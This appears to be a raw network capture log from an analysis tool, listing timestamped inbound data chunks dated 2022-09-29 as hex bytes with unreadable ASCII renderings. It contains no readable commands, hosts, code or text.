                                                                                                        2022-09-29 12:46:30 UTC11827INData Raw: ab f3 b2 67 e5 e2 c9 1f 70 e0 7c b5 59 b8 0d de 9f dd c6 80 b6 2d 74 d9 7f 1a 05 6f d6 2b ac 62 44 4e 63 23 00 27 69 cb 29 06 2d 66 27 a0 d2 54 1a b9 9e 81 a4 80 64 d3 f9 f7 d7 cd 51 b5 18 8b 53 9f c6 5a 97 da b3 10 69 2f 18 d6 f2 9d 2a db d9 47 8e e0 a2 7b 8b 9d f0 9c 74 1f bf 45 ca 29 14 94 0a 67 d7 3e 97 ec d6 fb d4 99 9a f2 5d 61 39 da c9 d8 8f 30 85 28 95 ea a3 a4 2e 46 e3 b0 01 5d bd 43 93 80 e4 5d c2 28 1c 77 60 55 62 3e 38 69 5c 68 5d 46 48 6e e3 d3 29 15 ba e2 83 29 3e dc a1 9d 9a 16 0d 1e c4 f8 b2 45 df 8f 14 9a 41 2c 76 b0 3c 1c 70 1a f0 41 c2 a1 9d 10 2c 8c 38 7f ce ff 19 94 b1 ef c3 8f 63 36 3b d1 e4 1c fe 9b 16 18 e6 60 8e 6b 6c 24 e3 b1 c5 cf b2 b6 db 63 09 d0 56 be fa 89 da af 35 dd e3 75 0d 58 8e 5d be b8 a5 47 e2 50 1e c2 0a fe 6a 15 29
                                                                                                        Data Ascii: gp|Y-to+bDNc#'i)-f'TdQSZi/*G{tE)g>]a90(.F]C](w`Ub>8i\h]FHn))>EA,v<pA,8c6;`kl$cV5uX]GPj)
                                                                                                        2022-09-29 12:46:30 UTC11829INData Raw: 9e c4 23 55 12 24 a7 12 02 48 ed 07 3e 34 0e 43 40 da 49 94 fd 46 15 6b 79 90 b6 90 af 07 b6 a6 5c 2e 0c 77 43 2e 73 0f a2 69 b7 64 78 f5 b0 c4 de 29 2b 33 2a 8b d6 6e e8 ba 13 4f a6 c2 78 62 50 1d a0 07 43 f4 de 48 89 2f 20 aa fd b1 53 21 be 07 c4 f4 5f fa ed 58 b2 aa 07 a1 3b e0 59 8c 65 a9 40 da 10 3e c5 fa 16 c4 65 33 dc 4e e9 bc 8e de 04 07 f1 98 41 1f 5d 7e 89 72 e1 e4 0c bc 9f 76 68 49 9b 1d e2 24 b8 2a 75 cd cd 0e 8d 91 fa 79 18 64 6b 70 18 73 03 5e 40 e6 8e cb 00 13 24 d2 64 17 bf b5 37 d6 c1 05 56 46 2d d8 d7 d6 e2 1c f3 97 92 7b 29 5a 2d 15 ee e3 a1 5b f3 4b cc 97 ff 64 e3 d0 6c c9 13 db 6a 91 c1 0a 14 ea ba 24 2b a0 11 95 c2 1a 82 f0 b4 be aa f7 3e 2b 88 66 35 cd 77 6b 07 13 92 ff 41 59 b5 9e eb 72 e4 f6 c3 fe 34 5b 0c 31 2e df b9 6a 6d 28 25
                                                                                                        Data Ascii: #U$H>4C@IFky\.wC.sidx)+3*nOxbPCH/ S!_X;Ye@>e3NA]~rvhI$*uydkps^@$d7VF-{)Z-[Kdlj$+>+f5wkAYr4[1.jm(%
                                                                                                        2022-09-29 12:46:30 UTC11830INData Raw: 38 07 55 91 f3 d6 36 13 d1 8d 0e b3 8d ed 0c 36 0a e7 9f a2 6e f9 53 0c 9b 99 b2 01 3f 04 e5 88 85 7c 5d 59 d0 67 f4 53 97 ed 03 42 f0 f9 99 2f 5a 50 f2 ef 9a c1 8b 2d 3d ed d8 3d e9 17 b3 95 58 fc 93 c7 ee 4e 08 37 18 ed 1f 42 5d 02 4c 94 e7 77 e3 3c 07 a4 af 05 0b c0 a3 1b d2 ac a8 94 8d 1b aa cf 6a 29 c6 cb d3 fd 91 57 3c 9a ec b3 5c 31 e5 ac ee b8 49 a0 7e d1 40 a3 cf 46 7b 8d 57 b3 d7 6b 7b 1f ad 84 9b 81 a4 37 c9 41 03 fb ac 7b 0e ce 08 0a d4 63 ed 6d 5f 12 2c 72 12 0f e6 ff 83 47 08 23 30 b7 52 a0 a7 af 18 af f2 44 22 92 45 aa fd 23 20 3b cc af 74 23 bb 45 f5 4b 54 12 21 77 3a 39 52 b9 22 90 f4 bd 72 cc 59 2b 3c 1d 6b 7a 11 28 c9 02 86 e5 b3 91 26 99 5f e3 c7 44 b7 61 f3 04 41 cd 8e ca e7 ef 0c 04 65 30 aa 49 08 49 9e 0b ad 77 de ee 4a 8a 37 fa de
                                                                                                        Data Ascii: 8U66nS?|]YgSB/ZP-==XN7B]Lw<j)W<\1I~@F{Wk{7A{cm_,rG#0RD"E# ;t#EKT!w:9R"rY+<kz(&_DaAe0IIwJ7
                                                                                                        2022-09-29 12:46:30 UTC11831INData Raw: 0d a0 75 8c fd 8d cc 9f 2d 8b 08 d8 61 e9 fc 2b 5e 70 43 b8 b1 11 b5 40 41 16 04 eb 9f a9 28 01 21 32 28 39 dd 2a 0b e8 3c 6f e4 26 a2 ab 45 94 dd f7 6e db ab 7a 2b 1d 48 a6 83 94 18 0c 25 9b e5 fb af da 93 c0 3c 93 6b b1 0a df 61 69 ee ca 76 1f 3e bd 6f 9b f7 a4 ab 3f 1e fc 82 b4 ec 62 26 ca 94 26 1a c1 3c 65 45 6c 37 d2 02 4e 08 19 67 3a 67 a3 97 b5 e5 a4 82 1c ab b5 20 2b eb a1 85 d0 d9 0d 4f bb a0 e6 a5 89 21 b3 7e 9c 30 79 cd 03 68 97 b9 7e 4c 9e 99 24 a4 b8 1d 89 3e 7e c4 4b cd 3d 84 41 76 99 ca 2e 2d 00 10 2b 43 d9 bf dc 41 04 07 e8 2a 8f 3f c9 cc 8a 1d 1c fb 45 0e 12 11 23 ea 7c 87 ab dd ba 67 fe dd c3 e2 f0 98 1f d7 28 8e ec 57 03 8e 72 65 95 c8 e2 4f 18 34 ae 19 26 93 79 18 e4 2e 8a 53 dd 74 2e 7e 0b 6d 1f 0b d1 76 c1 2a 6d ef b1 a0 65 84 33 05
                                                                                                        Data Ascii: u-a+^pC@A(!2(9*<o&Enz+H%<kaiv>o?b&&<eEl7Ng:g +O!~0yh~L$>~K=Av.-+CA*?E#|g(WreO4&y.St.~mv*me3
                                                                                                        2022-09-29 12:46:30 UTC11832INData Raw: be 66 ec 13 a3 26 df 89 3c ed a2 81 08 fb f7 8b 58 35 ed ec a7 25 20 1d 90 a4 79 64 57 b8 b8 c5 a8 3a 5e 63 69 e0 a2 62 df e4 6c 9d 19 56 8f 30 bd d7 d8 0b 64 1a 28 2f 6d 45 3c 08 69 73 cc f1 f9 f7 b1 97 63 6d cd e3 5e ba 11 bf ab 1d 98 88 37 c8 08 62 3b a4 10 43 bf 13 eb 4a 12 08 a8 b6 d9 86 f6 75 7e e5 46 f9 02 9b 9d a4 08 b6 3a aa e5 af 6f 05 37 ed 2b 03 f1 a1 1a ec eb fe 8e 8d 14 16 d1 46 8a 40 8d 44 3a 30 c2 8b 02 89 75 38 29 e9 c6 4c c7 5f 0d 72 9e 85 1e 23 9e df 6a fb 22 0c e9 fe f0 d8 80 52 f1 54 d0 c5 23 d4 9e 41 89 98 ed b2 be d0 7f 07 93 5c cc 1e 81 63 e7 2f 75 c9 a7 ab 19 6a 5f f7 1b 08 9c 02 91 d9 5d 6e 4d 41 c1 87 62 cf a8 e5 8f 5c 86 2d 9b 0e 6d 5c ad 72 21 75 58 9c 52 fd dd 6c fe ea a9 02 83 e2 7e 5d bd 8f 3c 2d 87 57 36 dc 45 ae 56 2a a1
                                                                                                        Data Ascii: f&<X5% ydW:^ciblV0d(/mE<iscm^7b;CJu~F:o7+F@D:0u8)L_r#j"RT#A\c/uj_]nMAb\-m\r!uXRl~]<-W6EV*
                                                                                                        2022-09-29 12:46:30 UTC11848INData Raw: 85 fe 40 02 51 a2 3e 81 ae de 1b 1d 21 9b 9e 20 f8 46 91 16 32 5b a5 a7 93 41 39 43 4a 58 04 cf e8 e5 4d cc 27 89 40 8a 9e 1d 84 66 81 3b 8b fe e5 0b 0d 24 cb 12 96 b3 fc 9e 2d cb 40 e9 4c 83 55 24 18 44 50 48 20 9a a2 c1 c0 4a 7b e7 16 fe 32 8f e9 fb 59 76 87 48 97 f2 ac 4d 15 16 b6 15 aa 70 ac 23 97 e6 8d 77 0f de 90 55 ca d4 60 61 ba ab 82 b3 20 a4 f6 ff 20 5f 94 42 2e 2a 2e 82 1a 48 f5 64 7f 5b e0 86 07 ac 37 3c 7f 56 a0 0d bf a8 7a 41 a2 7b 4e df be 7a 53 a0 68 2a bc ce d9 9c f4 8a 51 45 c6 b9 48 36 ae c0 af 25 2d 16 d1 12 a5 c0 6e 12 0d c5 60 58 d7 99 94 1d 43 7c bf 4c 14 68 20 68 46 24 d7 5b 22 78 60 98 69 19 a2 37 8f 64 75 8d 58 1f b9 ed c3 ff cd f3 fd 68 96 19 8c 20 b5 db 8d b1 66 ed 6c a0 04 fc 31 ab 22 45 6e 27 36 8a e2 0c 49 c9 c6 9a 84 fd c8
                                                                                                        Data Ascii: @Q>! F2[A9CJXM'@f;$-@LU$DPH J{2YvHMp#wU`a _B.*.Hd[7<VzA{NzSh*QEH6%-n`XC|Lh hF$["x`i7duXh fl1"En'6I
                                                                                                        2022-09-29 12:46:30 UTC11864INData Raw: 99 83 4b 97 da 58 ec 15 c1 84 6d f7 39 3e 56 26 56 af 98 8d 8d 87 b8 1f fa fd 82 dd 32 e7 52 ba 35 a1 7f 76 e5 bf dc 13 5b 4f e9 9c b0 01 f5 f7 98 45 ab e9 29 1f f7 33 11 0d 1f 46 2a cd 3c 85 01 6a 2b c5 6e 90 9e 05 6c 9d 0d af 26 eb d9 40 05 fe a6 67 0f 8d ed 7f a4 39 c3 95 a6 26 f0 32 b4 fa 41 52 02 f6 cc c5 4f 6e 70 f5 a9 3d 68 82 e1 3d da 4c e4 52 aa c2 a0 21 bf a4 81 83 80 05 99 02 3b 5a 58 18 c9 61 4e 13 8e 62 26 cc ed 4e 61 17 34 f4 c6 ff 04 f9 9a 12 7c 1b eb 9f 94 0e 6a 02 c0 21 e7 15 26 c3 34 04 d7 f6 b2 56 40 48 d9 d5 8f 74 b0 b8 1a f3 d2 51 57 b5 62 94 95 b6 60 95 ae f3 b2 04 67 02 7b f0 bd dd c3 62 94 79 e7 50 3b e5 57 a4 3b 60 d1 fe ec f7 03 4b fd 52 80 c5 51 f9 ac f2 27 b4 75 48 2b c9 89 5f 66 75 bd e3 d3 ef d2 e3 cd 49 67 fd 6a 84 4e ab d2
                                                                                                        Data Ascii: KXm9>V&V2R5v[OE)3F*<j+nl&@g9&2AROnp=h=LR!;ZXaNb&Na4|j!&4V@HtQWb`g{byP;W;`KRQ'uH+_fuIgjN
                                                                                                        2022-09-29 12:46:30 UTC11880INData Raw: c5 dd d7 5f 28 68 12 bd 1a b2 88 58 45 eb c1 c6 c5 64 80 9c e7 26 f6 ed 6e 86 58 2b ac 1e 38 dc 3e b5 d9 84 5e 8a 6d 8c ba 2a 7e ad d2 a7 06 f7 ce 1f bb e7 aa b0 c5 8a b2 9e b8 66 3f b8 e0 bb 8f 41 bd 70 b0 10 e1 32 a1 03 6d 84 4d 8f 02 8c c0 66 f0 3d 3a 0e 3a b8 8b f3 ff 2f 5a 0d 47 c5 b5 b6 2c 4e df 57 0d 89 9a 5d cd 43 c8 5f 0e d3 03 82 50 e8 70 1a 14 14 f4 d5 b6 5b 00 f7 bb f3 89 1d 55 d3 ce d5 aa 3e dd 8f ec db 03 19 1f 50 cc 3c 87 19 c3 a8 2b 28 1b ac 59 46 30 14 2d d8 1f 02 6f f8 1c c0 5b b6 d8 60 08 9a c8 12 58 3c 41 22 94 5d 7e 3f 79 30 54 4b 0a 7d 1d 4a df 4f c5 d3 03 26 93 88 e5 43 5e 31 29 08 44 06 01 bf 52 28 56 4b 0e ea 4b db de 1b 54 5c 91 63 31 bc 24 7a d2 e9 3e 8f d2 bc 8a a6 02 e6 8c fc bf 6f 29 52 4e 25 ce f6 d5 78 37 3f 67 14 99 54 57
                                                                                                        Data Ascii: _(hXEd&nX+8>^m*~f?Ap2mMf=::/ZG,NW]C_Pp[U>P<+(YF0-o[`X<A"]~?y0TK}JO&C^1)DR(VKKT\c1$z>o)RN%x7?gTW
                                                                                                        2022-09-29 12:46:30 UTC11896INData Raw: 87 fb 6d ac 3f 05 7c 89 cc 96 95 cc 98 d5 a1 f1 17 d5 50 72 77 4b 18 61 2e e9 12 2d b2 e4 26 58 84 31 b2 07 49 e5 91 ea e7 6e 35 78 0b 35 22 c2 be 7c d0 f5 1c 13 93 4d 62 0b 3a 85 a0 4f c0 fe 63 15 44 69 cc 1d 1e d0 ef 9e 7a a2 c1 00 70 3b 28 26 1d a8 52 a6 45 e6 e2 15 94 30 38 4a 17 28 30 db 96 a1 22 68 2b 56 e6 00 e0 d7 4e 8f 2c 08 d1 94 5d a4 be 79 4b 16 b5 dd d0 46 c2 6d 1e b7 d7 b2 26 b8 6c ec 0c b0 be 99 d0 b5 06 77 81 f2 af 72 dc fa 1b 7f cc 6e 08 09 0c 32 17 35 ba 04 57 b6 ee 66 fc 85 07 a8 c0 48 76 05 58 d8 d6 38 fd 33 60 f0 dc 5f af cb f0 5a 03 79 3a 52 6c e3 43 71 7d 9a 03 cf ed c0 04 1d b3 b9 f8 e5 56 56 57 99 ef 32 1a e7 9e c3 77 b4 06 27 93 87 b4 f4 74 d6 e8 46 d6 02 bc b6 e9 10 5c 9a bf 72 42 64 42 8e c0 c7 09 0e 1f b3 28 7a 62 b3 b9 20 8e
                                                                                                        Data Ascii: m?|PrwKa.-&X1In5x5"|Mb:OcDizp;(&RE08J(0"h+VN,]yKFm&lwrn25WfHvX83`_Zy:RlCq}VVW2w'tF\rBdB(zb
                                                                                                        2022-09-29 12:46:30 UTC11912INData Raw: 9b 97 db 79 dc ed 1e 59 d7 9d 72 93 10 e0 ff ea 07 52 b3 ca 91 53 70 5c a0 8c 36 f0 7d 75 c0 b5 97 f2 85 7f 33 db 3d f9 4a 0b e5 a8 fa b0 5d b7 11 64 2b d4 31 f4 82 8b 69 22 d2 1f 0d 13 96 a6 34 5d 36 9e 31 50 1f 7e cd 6e 0d 85 c0 d9 48 92 9c b1 83 0f b6 8d 30 9e 16 ef 73 2f 0b e0 92 9a 45 f2 3f e6 21 40 78 2b bd e1 8c e8 45 96 5c 11 a4 12 7a 9d 32 be f6 ef d1 5f 9b 48 f3 d8 70 eb 52 28 f6 14 9e 8e 19 be 4b 5a 1c d1 c7 b1 17 e4 c3 b4 b0 aa 5f 4c dc 77 22 86 8e 61 59 55 72 5a 4a af 81 dd 18 10 7a ac 1b 61 36 ab 6c 5f e0 03 76 74 95 38 e9 41 b6 a6 39 18 b1 b2 87 50 c4 5f 28 db d3 3c e5 2b b2 ed 07 bf 16 08 27 e1 bb dc 3a 0a 91 fd 6d a5 90 e1 ba d6 b3 ee 9a bb 3b c0 69 e6 80 9d bc 03 6a 6f 65 c4 8f d6 e1 24 82 c3 1b 30 44 4f 24 d2 6d 3e 49 0d 0a af 04 52 6a
                                                                                                        Data Ascii: yYrRSp\6}u3=J]d+1i"4]61P~nH0s/E?!@x+E\z2_HpR(KZ_Lw"aYUrZJza6l_vt8A9P_(<+':m;ijoe$0DO$m>IRj
                                                                                                        2022-09-29 12:46:30 UTC11928INData Raw: c5 d7 62 65 85 0e 5b 65 27 10 bb ff 25 a2 fd d4 ef 18 40 a2 d1 bf 49 2e 87 b5 34 b9 5a 4e d8 23 8d 53 44 6f f8 ab 0d 23 f5 b3 6f e9 70 d0 af 60 a9 f8 9e fb 2f 7f b2 c0 9d d6 5a a2 56 24 e7 18 97 4c 6c 78 f7 5d b6 97 9c 45 1f 91 3c c6 03 31 5b 69 4c 0a e0 9d c7 78 16 b2 5f f6 6d 14 25 de 1c a5 ae 07 a9 08 3b a9 09 f0 74 be ab 6e 19 02 f3 14 b3 7c d3 a4 fa 85 7e 58 7a f8 a3 f7 69 8d 63 f3 02 93 c6 1f e9 0e 6e 01 eb cd 1f a6 ae d1 25 5c 8c 78 3e 3d a1 3c c3 ac 15 24 71 ed 74 19 72 81 e7 29 4a 0b a3 eb 35 ef cf 31 39 d2 8a d0 7e 57 d3 e9 81 eb 6b 01 a7 db 94 08 a4 7e 47 d1 d3 a4 38 09 55 38 da 8d 2b 9d 5e c1 32 65 d0 05 db b8 49 10 f1 19 16 15 b1 f2 2e 36 50 b1 de 27 f7 ac 3d ba 15 6a 9b ba a3 78 6c b4 19 1c f3 4e 53 3a 03 26 ad 9b db 66 95 85 d4 9b d8 07 c7
                                                                                                        Data Ascii: be[e'%@I.4ZN#SDo#op`/ZV$Llx]E<1[iLx_m%;tn|~Xzicn%\x>=<$qtr)J519~Wk~G8U8+^2eI.6P'=jxlNS:&f
                                                                                                        2022-09-29 12:46:30 UTC11944INData Raw: 54 c0 80 8b bd 78 d1 fd 54 a2 5d c2 37 01 c3 b5 6b 21 76 5b ce 46 ae db 43 92 2f e8 46 95 0a 9c ce be 36 1c dd 9b 56 05 48 91 d6 17 fa e9 2e e0 f6 52 e2 85 4a 62 f2 e4 02 b1 16 04 a4 0b 5d b6 63 0b 13 0f 8f d5 ef 46 49 cb a7 9e 0f a0 8c 8f 31 84 34 ae 1b 42 77 d5 5c de 3f 07 e6 a6 b6 c5 8d d9 4f 5b 43 5e 0a 20 76 01 f3 30 ae c9 dc 7b 37 25 39 27 2a a2 01 84 52 fd 23 e2 be 07 c6 78 3d 4d 0d 02 13 88 03 de cf 10 8b 22 15 8d da 63 70 8c 5f be ab 35 ef 80 f3 6c e8 8f e3 52 a8 4a 2f f5 c8 e4 50 7a fe 8a 7d 62 9e 68 95 da 09 9c 9d 4c b5 fd 0a 70 82 1f c9 51 34 52 16 8d 78 05 77 58 b4 55 91 93 c7 66 1b e9 cc fb 4a 97 a5 1e df 59 f0 2a 6f 5b 1f 14 df fa ed 82 0e 86 e4 3a 8a a9 2a 82 b7 6c 83 73 41 5e 65 61 66 c9 da 93 ec 3b df a7 63 83 95 df 12 f4 01 d3 03 a6 f2
                                                                                                        Data Ascii: TxT]7k!v[FC/F6VH.RJb]cFI14Bw\?O[C^ v0{7%9'*R#x=M"cp_5lRJ/Pz}bhLpQ4RxwXUfJY*o[:*lsA^eaf;c
                                                                                                        2022-09-29 12:46:30 UTC11960INData Raw: f0 33 76 30 c4 41 a9 1d 00 c7 09 dc b5 c2 b3 a5 ec d0 a3 f9 95 24 ac 13 25 b9 e8 83 c7 2c 30 17 68 1a 99 e6 af 91 d8 52 5f 85 b3 40 7d bf 51 5c ac c7 df b2 49 a0 b7 f4 ca 2b 5a 1b 47 74 6a db 5b c4 f7 f2 56 a3 86 32 92 af b4 20 3f 61 31 46 a5 47 d9 47 6f 55 df 9c 96 d1 c4 38 0e 9a 34 ba 16 25 24 6b 22 25 53 e3 d1 4d 38 fb e4 6f 69 79 b7 b7 67 2e 85 09 7b 17 f0 9c d2 b2 99 6f 97 b3 94 08 83 6b 56 0b 93 71 4e 2d c5 65 d1 3f 24 cd 39 00 9b 82 f5 69 de 74 f7 f6 bb 2c cf 30 04 a4 64 93 54 bb 6e 6b 66 14 4b 5b 68 e6 cf 63 20 89 18 c9 b7 5e ec 2a 9d 43 ba b8 cd c5 9e 06 83 3a b6 0a 9b 8a 9d ca 86 e4 f5 e5 2c 8e c5 a0 ff cf f9 4a 3a 3d b8 19 4b 77 0c 33 46 7a 62 0d b9 81 de 0e 0f e6 16 d8 b1 30 91 c2 22 fa d5 b4 fb aa c1 5f 5e 6c d0 fa e8 11 37 7c 6a e9 f3 69 f1
                                                                                                        Data Ascii: 3v0A$%,0hR_@}Q\I+ZGtj[V2 ?a1FGGoU84%$k"%SM8oiyg.{okVqN-e?$9it,0dTnkfK[hc ^*C:,J:=Kw3Fzb0"_^l7|ji
                                                                                                        2022-09-29 12:46:30 UTC11976INData Raw: 34 49 26 b1 76 ac f2 6f ea a4 c7 9b 53 86 42 99 74 84 c8 11 e8 86 14 ed bd 89 a1 d5 ff 62 33 3b d1 95 1e fc a4 16 41 ea c6 a7 e6 ff 51 08 7f cb e7 8e 76 ea a4 d4 bb 3f b1 66 5c 1b 46 76 e5 d7 1b 2d 88 07 67 a8 c5 84 81 0f 57 c1 2f 16 ef 0d d4 2f a2 d0 d9 12 0d 62 a2 38 51 16 ef c7 18 6f 81 dc fd ac 18 63 b2 c8 46 ac 90 d5 e9 1c b4 1e c3 bc 16 59 bd 8f ab 42 13 b6 64 1d dd 44 19 9d e9 74 b4 74 2c a1 af ff f2 10 f0 67 8a ba 16 35 f2 a2 c4 43 99 32 06 1f d3 0a 77 3a d6 46 1a c6 6b 75 79 06 93 5b 36 3b ed e1 08 ee 1e 5a 57 39 56 c1 bb 20 d1 e8 5e 5e fa ef 62 ee d8 39 f0 78 a7 bb 20 a5 7e 3c ae 08 51 ad b2 7b 95 3f c8 1d 13 af fe df 70 68 00 a9 3c e9 a2 07 ca e4 eb 67 9b 26 7d 61 8b f1 8b 77 b5 b8 20 b3 ca 6f 88 e4 65 b8 22 0f 88 14 69 ef 43 a2 7f 05 8b a9 2d
                                                                                                        Data Ascii: 4I&voSBtb3;AQv?f\Fv-gW//b8QocFYBdDtt,g5C2w:Fkuy[6;ZW9V ^^b9x ~<Q{?ph<g&}aw oe"iC-
                                                                                                        2022-09-29 12:46:30 UTC11992INData Raw: 05 18 7f 66 04 c4 f5 c0 ae 88 00 2b aa 98 ef 09 14 c7 b2 92 29 ab 12 71 ab 2d aa 3a d5 8e 8e 3c c1 1e ff 89 7a a7 3c ac 95 8d 80 e2 9f d5 f4 18 c8 e0 2d 58 21 94 99 ea 96 65 8f 9a cb 0e 69 43 69 2f c7 bb 22 af e3 bd 77 40 84 6b 7a 84 62 44 33 f7 27 0b 46 2f 87 ad 7a 3f a6 79 4e 0d 98 1b 6c 7a 09 de 62 a4 50 10 02 db 18 ce d1 95 7c 7b 62 dc 4c f8 88 1e ae e4 b3 21 df 45 ea a6 db 07 02 e7 4c 9e 5c be 5d 31 29 ab b9 27 13 38 f5 2f 63 3e a7 15 39 6b 63 c9 83 74 ad 9f 46 25 f0 51 8f 57 fb 1c e8 c7 b1 07 9d 3c 10 60 87 f1 bb 69 cb e3 8d 5e 57 e6 31 56 af a3 71 4a 07 51 53 92 b5 61 aa 3c 0c 3e fb 94 4a 6b d5 f0 df c0 36 0d e2 1b c1 38 0c 49 e0 7e 1d 54 38 e4 2e 09 1d 76 b9 42 3b 08 46 49 27 1b 44 de d2 03 ae b3 96 d5 be e7 dc 62 e3 47 db 27 21 1e c9 62 6c 52 00
                                                                                                        Data Ascii: f+)q-:<z<-X!eiCi/"w@kzbD3'F/z?yNlzbP|{bL!EL\]1)'8/c>9kctF%QW<`i^W1VqJQSa<>Jk68I~T8.vB;FI'DbG'!blR
                                                                                                        2022-09-29 12:46:30 UTC12008INData Raw: e8 a2 aa 02 6d 5c f2 66 24 f2 9a e8 9d 90 1f 20 b3 f6 73 3c ae 7d f9 d6 eb 1f 87 30 3b 03 3f ad 78 f9 cd e1 c8 a7 2c 68 17 34 9f c8 9f 7c d0 83 2c 59 40 c5 33 f7 3e fa 6a 7f 6e f1 66 25 98 22 fe e3 ed e9 db 1e 27 11 d0 47 d2 1a b9 ee b6 59 6d 89 bc 5c 45 e5 e0 f2 e9 e1 30 32 63 23 08 e2 fc 55 58 56 88 34 ce ca a7 1f 45 7a 0d e6 e9 4c 17 2b a2 26 43 6e 97 d9 ea 39 32 dd ca d1 e6 3e 9a 74 5d 10 4a 26 d1 c0 55 51 48 62 f9 e2 fe 26 06 ab ba fa 27 71 8b be 12 c8 27 a5 3e f7 89 7b f2 a6 f0 fa d0 ab 91 18 e3 4d 76 69 59 96 6a e2 94 57 b0 43 cf ef 93 3a 8e 11 36 b3 bf 85 6d 21 91 bf ed 32 48 e2 99 2d 56 2c d3 7e b1 65 1f 79 e0 24 f4 98 4b 99 10 ef 33 31 55 a5 8e a2 15 11 97 05 51 5a 7f 18 a2 ce 0d ac 25 51 f4 3d b0 8f a0 86 02 a7 f5 12 cd e6 97 60 6c 24 18 10 0e
                                                                                                        Data Ascii: m\f$ s<}0;?x,h4|,Y@3>jnf%"'GYm\E02c#UXV4EzL+&Cn92>t]J&UQHb&'q'>{MviYjWC:6m!2H-V,~ey$K31UQZ%Q=`l$
                                                                                                        2022-09-29 12:46:30 UTC12024INData Raw: 97 56 2f 2e 42 22 75 0a d5 1b 65 c4 d7 4f 1b be 98 ef a3 12 66 af 66 71 c1 d4 6c 8f 1d 41 9c fb c2 b9 0c 56 95 c1 dd 9b 8f 17 35 5b ef 4e b4 4e ab dc af e4 67 a5 79 3a d9 bb f9 1c 55 ea 0a ba 5c 49 e5 4f 21 b0 26 fd 97 08 7d b7 74 fd a6 5e ee da d7 40 24 69 e8 2d a9 f8 01 7c 10 b5 07 ae 1c b4 bf 50 29 d1 15 c1 bb d5 ff 28 74 a5 de a0 6b e9 19 bf 10 bf f5 d9 36 4b 92 66 77 98 b1 fd b5 cf eb 10 35 76 50 0f 8b 5d aa a9 09 01 91 0a e2 d2 60 c3 7c cc 7a 99 26 1f 8a ff ef 30 35 d0 7d 8c 8e 17 49 e4 89 fe 2e 59 2b 7b 34 9f 01 b9 d4 9b 8e be fc 4b b4 1e b5 fe bc 94 68 04 8d 2a f1 74 86 ca 32 ad 04 67 1a 73 31 7c 64 d3 bd 58 0d bb e2 4f 29 fe a0 a5 9d 40 09 91 48 56 ec 9a 6d f6 63 35 d9 77 80 d3 91 a6 e8 e6 73 1c 4c 70 f9 66 57 2a e8 6c 51 73 26 ad 21 a2 2e 4d 8a
                                                                                                        Data Ascii: V/.B"ueOffqlAV5[NNgy:U\IO!&}t^@$i-|P)(tk6Kfw5vP]`|z&05}I.Y+{4Kh*t2gs1|dXO)@HVmc5wsLpfW*lQs&!.M
                                                                                                        2022-09-29 12:46:30 UTC12040INData Raw: d5 59 ec da d6 d1 78 76 ec 66 eb af cf 75 a7 06 8b 28 96 aa f8 6d a9 94 f3 96 dc 75 bc ff c7 b4 0d 69 94 08 f6 eb 98 83 15 77 4e 0b 28 b1 4a b5 08 09 f8 b8 ec e6 2a d1 09 7a b7 50 0c 2e 0d 4d 1a 8e d3 08 98 47 db be 1c 93 69 33 08 d0 1d 66 6e 47 92 83 a3 fa 08 36 84 0a 0e 0d f4 c8 c1 f1 f0 1e 2b 7d 06 1f e3 c3 55 f4 74 1f ad e2 72 aa d2 38 70 56 a2 f6 14 4b dd 29 64 26 45 28 56 19 ed a3 1c 8b a4 7c 7b de 50 48 6c 7a 1d 95 a3 d6 5e d0 4a fe 0c 70 9f 4b 30 3b 4b 33 77 53 52 32 e8 41 52 a8 05 6d 4e a1 d5 71 ec 73 ff 30 df 3c 33 6a e0 23 c8 c9 85 9a ce 44 5b db bf 24 be 32 e0 39 f7 e8 60 3b 7f 3c 2d 8e e2 e9 11 f3 f5 57 b0 c1 68 54 27 18 e1 9b 54 d1 65 c3 6f dd 49 b3 ec 87 ca 61 53 cf 4a 3b 0c eb 64 fe 93 ef a2 c4 eb 4a 85 06 bf a4 27 b6 68 82 21 7f e6 dd 7c
                                                                                                        Data Ascii: Yxvfu(muiwN(J*zP.MGi3fnG6+}Utr8pVK)d&E(V|{PHlz^JpK0;K3wSR2ARmNqs0<3j#D[$29`;<-WhT'TeoIaSJ;dJ'h!|
                                                                                                        2022-09-29 12:46:30 UTC12056INData Raw: c6 7b 9f 54 95 a9 a1 42 d8 cd 9d 38 f7 f8 f2 55 93 d7 64 28 92 1c 43 7f 41 c1 9a aa 61 ec 14 d1 b9 89 af 70 47 d6 51 8d 01 07 48 5b cb ae 62 81 db 3d c9 6a 1f 7f d7 31 33 68 e7 25 94 08 92 34 7c c8 00 7f 22 74 30 23 2a d4 b3 9a 8b 02 c1 f6 9b 8d 1d d0 26 84 4d a5 5c 73 a8 94 32 fb 64 25 a5 c0 0d 41 66 e5 1e 9e c7 b5 40 98 f4 f1 bc b1 8f 35 57 47 15 45 04 a1 d7 a7 22 42 75 a2 cf ff 4a f9 5e ca 7b 5a dc b1 3c 7b 96 a3 55 64 5a eb 8d 72 24 ea a9 db 29 08 52 d1 c7 6d a1 b2 de 20 4c b6 7c 67 0a 80 00 39 1c ea a8 1c 50 9a 73 27 50 05 91 25 5b 63 d9 e9 5a f8 0c 5d 6b f7 31 2b 89 85 65 29 db 21 f6 91 e9 cf 78 ff 79 68 38 6f 56 0d f4 1e 71 74 f5 55 73 bc e6 da de 64 e5 ae 30 71 93 0c b0 8f ff 3f ed 69 64 06 3c c3 e9 8d 25 65 31 c9 5e 17 97 f5 76 6e 18 b4 37 db 96
                                                                                                        Data Ascii: {TB8Ud(CAapGQH[b=j13h%4|"t0#*&M\s2d%Af@5WGE"BuJ^{Z<{UdZr$)Rm L|g9Ps'P%[cZ]k1+e)!xyh8oVqtUsd0q?id<%e1^vn7
                                                                                                        2022-09-29 12:46:30 UTC12072INData Raw: 4c b5 eb b0 e2 08 35 b4 35 f9 26 f1 05 b8 4c aa 6d 45 78 a1 d4 d4 73 55 72 c2 4b 32 6f 28 d8 ef 24 38 30 d3 45 bf 89 a7 0a 95 64 5c 1b 17 60 c0 2b 19 ee 93 68 05 5a 61 af 7b 28 12 b7 67 bc a4 aa 8b aa 56 ca 67 63 1d 4a 98 21 bf 71 cb 2b a7 93 a7 5c 3f a9 81 ea bc 75 30 f6 23 02 1e f3 46 ea 0e f2 39 c9 a5 c8 9b 43 14 d3 c6 d8 f5 92 3b e0 cd 35 f7 d2 42 da 97 37 fa bf ad 00 00 cf 4f ea bf 79 dc 16 ed 34 e4 3a c9 46 c3 2f a8 9b 2e 43 c9 81 08 91 65 11 78 59 3b ce 51 98 e0 5a 74 cd 68 4a d4 aa ef 5d 7f cf e6 87 37 e0 03 62 90 f7 5a 78 71 f4 58 a9 9b f8 96 4a 8e 22 31 2d c9 24 10 76 